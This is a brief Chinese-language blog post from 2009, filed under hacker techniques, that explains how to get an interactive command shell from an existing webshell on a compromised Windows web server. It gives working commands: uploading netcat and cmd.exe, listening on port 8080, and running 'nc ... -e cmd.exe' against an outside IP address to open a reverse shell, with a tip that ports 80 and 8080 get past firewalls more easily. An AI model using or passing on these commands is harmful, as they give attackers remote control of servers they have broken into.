查看文章 |
黑客技术
2009年08月02日 星期日 上午 03:00
虽然是低权限的,能做的事和webshell上的差不多,不过使用起来还是要方便很多。
前提: 2.上传nc。可以跟cmd.exe上传到同一目录。 步骤: nc -vv -l -p 8080 最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被apache占了,就用8080了。 在webshell运行下面命令连接我们监听的端口得到cmdshell: nc -vv 222.71.138.177 8080 -e c:\documents and settings\all users\documents\cmd.exe (假设cmd.exe是上传在“c:\documents and settings\all users\documents\”这个目录的) 不过我前面也说了,是低权限的cmdshell,能做的事情很少,但如果我们要运行很多cmd命令的话,还是要方便很多。 c:\windows\system32\inetsrv>"c:\documents and settings\all users\documents\cmd.exe"
|

